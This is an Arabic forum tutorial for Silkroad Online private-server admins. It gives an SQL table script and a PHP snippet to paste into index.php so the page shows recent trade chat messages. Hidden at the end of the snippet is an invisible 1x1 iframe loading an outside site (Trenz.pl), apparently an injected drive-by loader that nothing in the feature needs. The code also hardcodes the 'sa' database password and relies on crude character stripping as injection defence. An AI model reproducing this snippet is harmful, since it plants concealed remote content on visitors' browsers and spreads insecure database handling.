الموقع العربي الاول للعبة Silkroad Online

اول حاجة هتعمل ال Query ده

كود:

USE [SRO_VT_ACCOUNT] GO /****** Object: Table [dbo].[srZor_globalChatLog] Script Date: 03/11/2013 18:32:09 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO SET ANSI_PADDING ON GO CREATE TABLE [dbo].[srZor_globalChatLog]( [id] [int] IDENTITY(1,1) NOT NULL, [sender] [varchar](50) NULL, [msg] [varchar](300) NULL, [time] [datetime] NULL CONSTRAINT [PK_srZor_globalChatLog] PRIMARY KEY CLUSTERED ( [id] ASC )WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY] GO SET ANSI_PADDING OFF GO

وبعد كدة هتفتح ال Index.php وتحط ده فى

كود:

<?php $ip = $_SERVER['REMOTE_ADDR']; $time = date("l dS of F Y h:i:s A"); $script = $_SERVER[PATH_TRANSLATED]; $fp = fopen ("[WEB]SQL_Injection.txt", "a+"); $sql_inject_1 = array(";","'","%",'"'); #Whoth need replace $sql_inject_2 = array("", "","","""); #To wont replace $GET_KEY = array_keys($_GET); #array keys from $_GET $POST_KEY = array_keys($_POST); #array keys from $_POST $COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE /*begin clear $_GET */ for($i=0;$i<count($GET_KEY);$i++) { $real_get[$i] = $_GET[$GET_KEY[$i]]; $_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]])); if($real_get[$i] != $_GET[$GET_KEY[$i]]) { fwrite ($fp, "IP: $ip\r\n"); fwrite ($fp, "Method: GET\r\n"); fwrite ($fp, "Value: $real_get[$i]\r\n"); fwrite ($fp, "Script: $script\r\n"); fwrite ($fp, "Time: $time\r\n"); fwrite ($fp, "==================================\r\n"); } } /*end clear $_GET */ /*begin clear $_POST */ for($i=0;$i<count($POST_KEY);$i++) { $real_post[$i] = $_POST[$POST_KEY[$i]]; $_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]])); if($real_post[$i] != $_POST[$POST_KEY[$i]]) { fwrite ($fp, "IP: $ip\r\n"); fwrite ($fp, "Method: POST\r\n"); fwrite ($fp, "Value: $real_post[$i]\r\n"); fwrite ($fp, "Script: $script\r\n"); fwrite ($fp, "Time: $time\r\n"); fwrite ($fp, "==================================\r\n"); } } /*end clear $_POST */ /*begin clear $_COOKIE */ for($i=0;$i<count($COOKIE_KEY);$i++) { $real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]]; $_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]])); if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]]) { fwrite ($fp, "IP: $ip\r\n"); fwrite ($fp, "Method: COOKIE\r\n"); fwrite ($fp, "Value: $real_cookie[$i]\r\n"); fwrite ($fp, "Script: $script\r\n"); fwrite ($fp, "Time: $time\r\n"); fwrite ($fp, "==================================\r\n"); } } /*end clear $_COOKIE */ fclose ($fp); ?> <div id=page_top></div> <div id=page_content style='min-height: 750px;'> <div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'> <div id="spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div> <?php $server_name = "Vortex-onlie"; //Server name $host = "VMI32631\SQLEXPRESS"; // SQL server name for example PC-NAME\SQLEXPRESS $user = "sa"; // SQL username $pass = "dusty@123"; // SQL password $db = "SRO_VT_ACCOUNT"; // SQL Database; $show = "30"; //Show top 10 for example ?>  <html> <head> <style type="text/css">  </style> </head> <body> <?php @$connect = odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}", "".$user."", "".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]", "", odbc_errormsg())."</b></center>"); @odbc_result_all(odbc_exec($connect, "SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or msg like '%WTB%' order by time desc")); ?> <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> </body> </html>

والجزء اللى بالاحمرة ده اللى هتعدل عليه لبيانات السيرفر بتاعك